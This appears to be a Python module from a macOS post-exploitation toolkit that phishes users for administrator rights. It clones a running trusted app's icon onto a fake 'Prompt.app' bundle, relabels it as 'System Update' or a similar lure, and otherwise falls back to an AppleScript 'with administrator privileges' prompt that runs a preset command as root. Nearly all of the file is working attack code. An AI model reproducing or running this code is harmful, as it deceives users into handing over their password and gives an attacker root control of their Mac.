"""phishes for sudo with AppleScript""" import json import os import plistlib from time import sleep from .general import (DEFAULT_COMMAND, app_info, app_installed, app_running, interaction_prompt, osascript, random_string) __cve__ = "0000-00000" __credits__ = "thehappydinoa" def edit_app_info(app_path, prompt): """edit app info""" plist = app_path + "/Contents/Info.plist" info = plistlib.readPlist(plist) info["CFBundleName"] = prompt info["CFBundleIdentifier"] = "com.apple.ScriptEditor.id." + \ prompt.replace(" ", "") plistlib.writePlist(info, plist) def admin_prompt(app=None, icon_path=None, prompt="System Update", command="echo hello"): """prompts with administrator privileges""" rand = random_string() print("\nPrompting: " + prompt) if app: app_path = "Prompt.app" zip_path = "Prompt.app.zip" if not os.path.exists(app_path) and os.path.exists(zip_path): os.system("unzip " + zip_path) full_app_path = app_installed(app) edit_app_info(app_path, prompt) if icon_path: icon_path = full_app_path + icon_path else: plist = app_info(app) icon_path = full_app_path + "/Contents/Resources/" + \ plist.get("CFBundleIconFile") success_file = "/tmp/{success}".format(success=rand) os.system( "cp \"{icon_path}\" \"{app_path}/Contents/Resources/applet.icns\"; touch {app_path};".format(icon_path=icon_path, app_path=app_path)) payload = """open {app_path} --args "{command}; touch {success_file}; chmod 666 {success_file}; sleep 5; rm {success_file}" "{prompt}" """.format( app_path=app_path, prompt=prompt, command=command.replace('"', '\"'), success_file=success_file) os.system(payload) print("Application Launched...") wait = 0 while not os.path.isfile(success_file): if wait > 60: kill_app(app_path) return if not app_running(app_path): return sleep(1) wait += 1 return True payload = """osascript <<END set command to "{command}; echo {success}" return do shell script command with prompt "{prompt}" with administrator privileges END""".format(prompt=prompt, command=command, success=rand) response = osascript(payload) return rand in response def vulnerable(version): """checks vulnerability""" return interaction_prompt("Do you want to try to phish for sudo?") def run(): """runs exploit""" try: with open("apps.json") as json_file: APPS = json.load(json_file) except ValueError as error: print("Failed to load apps.json: " + str(error)) APPS = dict() for priority_level in sorted(APPS.keys()): for app in APPS.get(priority_level).keys(): if app_installed(app) and app_running(app): app_values = APPS.get(priority_level).get(app) return admin_prompt(app=app, icon_path=app_values[0], prompt=app_values[1], command=DEFAULT_COMMAND) return admin_prompt(app="System Preferences.app", prompt="System Update", command=DEFAULT_COMMAND)